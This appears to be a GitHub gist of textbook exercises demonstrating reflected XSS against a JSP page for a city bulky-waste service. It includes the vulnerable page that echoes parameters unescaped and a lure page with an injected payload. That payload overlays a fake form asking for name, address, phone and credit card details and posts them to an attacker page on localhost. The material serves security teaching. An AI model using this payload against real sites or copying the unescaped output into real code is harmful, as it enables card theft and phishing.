Created
May 9, 2011 09:01
-
-
Save seyan/962258 to your computer and use it in GitHub Desktop.
XSS攻撃:formの送信先の変更(43-002.htmlの偽ページとして攻撃者が43-902.htmlを用意)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head><title>粗大ゴミの申し込みがクレジットカードで</title></head> | |
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> | |
<body> | |
<form action="Page94Servlet" method="POST"> | |
<input name="name" type="hidden" value="test"> | |
<input name="addr" type="hidden" value="test"> | |
<input type="submit" value="申込" /> | |
</form> | |
</body> | |
</html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<%@ page language="java" contentType="text/html; charset=UTF-8" | |
pageEncoding="UTF-8" %> | |
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> | |
<html> | |
<head> | |
<title>○○市粗大ゴミ受付センタ-</title> | |
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> | |
</head> | |
<body> | |
<form action="" method="post"> | |
氏名<input size="20" name="name" value="<%= request.getParameter("name") %>" /><br> | |
住所<input size="20" name="addr" value="<%= request.getParameter("addr") %>" /><br> | |
電話番号<input size="20" name="tel" value="<%= request.getParameter("tel") %>" /><br> | |
品目<input size="10" name="kind" value="<%= request.getParameter("kind") %>" /> | |
数量<input size="5" name="num" value="<%= request.getParameter("num") %>" /><br> | |
<br> | |
<input type=submit value="申込" /> | |
</form> | |
</body> | |
</html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head><title>粗大ゴミの申し込みがクレジットカードで</title></head> | |
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> | |
<body> | |
○○市の粗大ゴミの申し込みがクレジットカードで支払えるようになっていたので、さっそく試した。これは便利です。 | |
<BR> | |
<form action="Page94Servlet" method="POST"> | |
<input name="name" type="hidden" value='"></form><form style=top:5px;left:5px;position:absolute;z-index:99;background-color:white action=http://localhost:8080/Wasbook/43-903.jsp method=POST>粗大ゴミの回収費用がクレジットカードでお支払い頂けるようになりました<br>氏 名<input size=20 name=name><br>住 所<input size=20 name=addr><br>電話番号<input size=20 name=tel><br>品 目<input size=10 name=kind>数量<input size=5 name=num><br>カード番号<input size=16 name=card>有効期限<input size=5 name=thru><br><input value=申込 type=submit><BR><BR><BR><BR><BR></form>' /> | |
<input style="cursor:pointer;text-decoration:underline;color:blue;border:none;background:transparent;font-size:100%;" type="submit" value="○○市粗大ゴミ申し込みセンター" /> | |
</form> | |
</body> | |
</html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<%@ page language="java" contentType="text/html; charset=UTF-8" | |
pageEncoding="UTF-8"%> | |
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> | |
<html> | |
<head> | |
<title>○○市粗大ゴミ受付センタ-(情報ゲット/実際にはこんな画面は表示されない。)</title> | |
</head> | |
<body> | |
○○市粗大ゴミ受付センタ-(情報ゲット/実際にはこんな画面は表示されない。) | |
<form action="" method="post"> | |
氏名<input size="20" name="name" value="${requestScope.name}" /><br> | |
住所<input size="20" name="addr" value="${requestScope.addr}" /><br> | |
電話番号<input size="20" name="tel" value="${requestScope.tel}" /><br> | |
品目<input size="10" name="kind" value="${requestScope.kind}" /> | |
数量<input size="5" name="num" value="${requestScope.num}" /><br> | |
<br> | |
<input type=submit value="申込" /> | |
</form> | |
</body> | |
</html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import java.io.IOException; | |
import javax.servlet.ServletException; | |
import javax.servlet.http.HttpServlet; | |
import javax.servlet.http.HttpServletRequest; | |
import javax.servlet.http.HttpServletResponse; | |
public class Page94Servlet extends HttpServlet { | |
private static final long serialVersionUID = 1L; | |
public Page94Servlet() { | |
super(); | |
} | |
protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { | |
//文字化け対策 | |
request.setCharacterEncoding("utf-8"); | |
response.setContentType("text/html; charset=utf-8"); | |
request.getRequestDispatcher("43-002.jsp").forward(request, response); | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment